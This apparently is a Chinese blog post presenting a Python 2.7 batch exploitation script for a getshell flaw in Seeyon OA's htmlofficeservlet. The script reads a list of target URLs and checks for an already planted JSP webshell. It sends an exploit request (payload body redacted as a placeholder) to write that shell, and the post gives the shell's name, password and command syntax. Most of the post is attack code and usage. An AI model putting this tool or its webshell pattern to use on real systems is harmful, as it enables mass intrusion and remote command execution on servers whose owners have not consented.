写在前头的话

也不知道是下午还是晚上爆出来的洞,反正晚上才知道,拿到exp赶紧写了个简单的批量脚本,估计洞早就被师傅们玩烂了,但是这里仅作学习,写写代码提升一下编写exp,poc及自用工具能力。仅作交流,滥用后果自负。

代码

注释掉了exp部分,请谅解。

环境: python2.7

库: hackhttp,re

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/env python
# coding=utf-8

import hackhttp
import re


print '''

                    致远OA getshell 批量漏洞检测利用工具。

                                       From ChaBug - 撕夜

'''.decode('utf-8')


def Geturl():
    list = []
    for url in open("url.txt"):
        list.append(url)
    return list


def Poc(raw_data):

    url_list=Geturl()
    # print url_list
    for i in range(len(url_list)):
        url = url_list[i].replace("\n","")
        shellurl = url + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+ipconfig"
        code, head, html, redirect_url, log = rep.http(url=shellurl)
        
        if "Windows" in html:
            print "[ + ] Shell Existing: "+shellurl.replace("?pwd=asasd3344&cmd=cmd+/c+ipconfig","")
        else:
            uu = url + "/seeyon/htmlofficeservlet"
            code, head, html, redirect_url, log = rep.http(url=uu)
            
            if 'DBSTEP' in html:
                print "Loopholes!!!"
                print "Please wait......"
                print Exp(uu,raw_data)
            else:
                print "Maybe no loopholes."
    
    print "[ * ] End of the test."


def Exp(u,data):

    code, head, html, redirect_url, log = rep.http(url=u, raw=raw_data)
    if "test123456" in html:
        return "[ + ] Shell address: " + u+"/seeyon/test123456.jsp"
        shellurl = u + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+ipconfig"
        code, head, html, redirect_url, log = rep.http(url=shellurl)
        
        if "Windows" in html:
            print "[ + ] Shell Address: "+shellurl.replace("?pwd=asasd3344&cmd=cmd+/c+ipconfig","")

    else:
        return "[ - ] Getshell failed please check it in yourself!"


rep = hackhttp.hackhttp()
# data = base64.b64decode('{exp_b64}')
raw_data = '''POST /seeyon/htmlofficeservlet HTTP/1.1
Host: *******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: Hm_lvt_3eec0b7da6548cf07db3bc477ea905ee=1534738067; _ga=GA1.1.1670437955.1534738070; Hm_lvt_ebfd8073dcbdb7573367d9c7aa04d998=1546780543
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111

{exp}
'''


if __name__ == "__main__":
    Poc(raw_data)

同目录下放一个url.txt即可。(url: http://www.example.com)

效果

简单的功能:

检测是否已经被写过shell,如果写过且密码为非原始exp密码则重新写入。

检测是否可能存在漏洞。

存在漏洞,写入shell。

(shell: test123456.jsp,pwd=asasd3344,执行命令方式: ?pwd=asasd3344&cmd=cmd+/c+whoami)

写在后面

对于被玩烂的漏洞写了个检测利用工具,纯属是为了提高代码水平,写的过程中的确遇到了点问题,最后换了hackhttp库,requests库post数据似乎必须带参数,因此纠结了一些时间。

6.27 补充,requests库可以无参数post,测试的时候payload有问题所以一直无返回内容。